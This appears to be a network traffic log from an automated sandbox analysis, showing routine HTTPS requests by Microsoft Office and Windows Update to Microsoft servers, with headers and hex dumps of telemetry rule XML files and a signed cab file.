            2024-11-21 08:50:16 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


            Session IDSource IPSource PortDestination IPDestination Port
            9192.168.2.44975913.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:16 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:16 UTC494INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:16 GMT
            Content-Type: text/xml
            Content-Length: 2980
            Connection: close
            Vary: Accept-Encoding
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
            ETag: "0x8DC582BA80D96A1"
            x-ms-request-id: 1aa7a34d-201e-0096-3676-3bace6000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085016Z-178bfbc474btvfdfhC1NYCa2en00000001b0000000004smw
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:16 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


            Session IDSource IPSource PortDestination IPDestination Port
            10192.168.2.44976013.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:16 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:16 UTC494INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:16 GMT
            Content-Type: text/xml
            Content-Length: 2160
            Connection: close
            Vary: Accept-Encoding
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
            ETag: "0x8DC582BA3B95D81"
            x-ms-request-id: 8ba33068-a01e-0070-5caa-3b573b000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085016Z-r1d97b995774n5h6hC1TEBvf840000000a1000000000bx2z
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:16 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.449763172.202.163.200443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:16 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FxaYLMr2BrGNYub&MD=cahBY3f6 HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
            Host: slscr.update.microsoft.com
            2024-11-21 08:50:17 UTC560INHTTP/1.1 200 OK
            Cache-Control: no-cache
            Pragma: no-cache
            Content-Type: application/octet-stream
            Expires: -1
            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
            MS-CorrelationId: 5ba27679-9c35-4fd2-afbc-7f09a96f7637
            MS-RequestId: fe5f0e52-ba9f-488f-9896-d87d17a43649
            MS-CV: UV8ci3eIsEmcuLe9.0
            X-Microsoft-SLSClientCache: 1440
            Content-Disposition: attachment; filename=environment.cab
            X-Content-Type-Options: nosniff
            Date: Thu, 21 Nov 2024 08:50:16 GMT
            Connection: close
            Content-Length: 30005
            2024-11-21 08:50:17 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
            2024-11-21 08:50:17 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


            Session IDSource IPSource PortDestination IPDestination Port
            12192.168.2.44976413.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:18 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:18 UTC491INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:18 GMT
            Content-Type: text/xml
            Content-Length: 408
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
            ETag: "0x8DC582BB56D3AFB"
            x-ms-request-id: f3d0c3d3-f01e-003c-676b-3b8cf0000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085018Z-178bfbc474bpnd5vhC1NYC4vr40000000160000000009ws8
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            X-Cache-Info: L1_T2
            Accept-Ranges: bytes
            2024-11-21 08:50:18 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


            Session IDSource IPSource PortDestination IPDestination Port
            13192.168.2.44976613.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:18 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:19 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:18 GMT
            Content-Type: text/xml
            Content-Length: 415
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
            ETag: "0x8DC582B9F6F3512"
            x-ms-request-id: a6bfa609-001e-00a2-4d66-3bd4d5000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085018Z-178bfbc474b7cbwqhC1NYC8z4n0000000160000000004zk9
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:19 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


            Session IDSource IPSource PortDestination IPDestination Port
            14192.168.2.44976813.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:18 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:19 UTC491INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:18 GMT
            Content-Type: text/xml
            Content-Length: 632
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
            ETag: "0x8DC582BB6E3779E"
            x-ms-request-id: f8ec4d19-201e-0003-46de-3bf85a000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085018Z-r1d97b99577d6qrbhC1TEBux5s0000000aa0000000002vw4
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            X-Cache-Info: L1_T2
            Accept-Ranges: bytes
            2024-11-21 08:50:19 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


            Session IDSource IPSource PortDestination IPDestination Port
            15192.168.2.44976713.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:18 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:19 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:18 GMT
            Content-Type: text/xml
            Content-Length: 471
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
            ETag: "0x8DC582BB10C598B"
            x-ms-request-id: 17c3c293-501e-00a3-6567-3bc0f2000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085018Z-178bfbc474bbcwv4hC1NYCypys000000012g000000007fvw
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:19 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            16192.168.2.44976513.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:18 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:19 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:19 GMT
            Content-Type: text/xml
            Content-Length: 474
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
            ETag: "0x8DC582B9964B277"
            x-ms-request-id: e592c5af-601e-000d-69fb-3a2618000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085019Z-1777c6cb754gc8g6hC1TEB966c0000000arg00000000kmpy
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:19 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            17192.168.2.44976913.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:20 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:21 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:21 GMT
            Content-Type: text/xml
            Content-Length: 467
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
            ETag: "0x8DC582BA6C038BC"
            x-ms-request-id: 7f65a9a1-801e-0067-788c-3afe30000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085021Z-178bfbc474bfw4gbhC1NYCunf4000000015g00000000csp3
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:21 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            18192.168.2.44977013.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:20 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:21 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:21 GMT
            Content-Type: text/xml
            Content-Length: 407
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
            ETag: "0x8DC582BBAD04B7B"
            x-ms-request-id: 239436ba-d01e-0028-7bd5-3b7896000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085021Z-r1d97b99577hsvhhhC1TEByb1w00000004e0000000005eqc
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:21 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


            Session IDSource IPSource PortDestination IPDestination Port
            19192.168.2.44977113.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:20 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:21 UTC491INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:21 GMT
            Content-Type: text/xml
            Content-Length: 486
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
            ETag: "0x8DC582BB344914B"
            x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085021Z-1777c6cb7544nvmshC1TEBf7qc0000000an000000000brsh
            x-fd-int-roxy-purgeid: 0
            X-Cache-Info: L1_T2
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
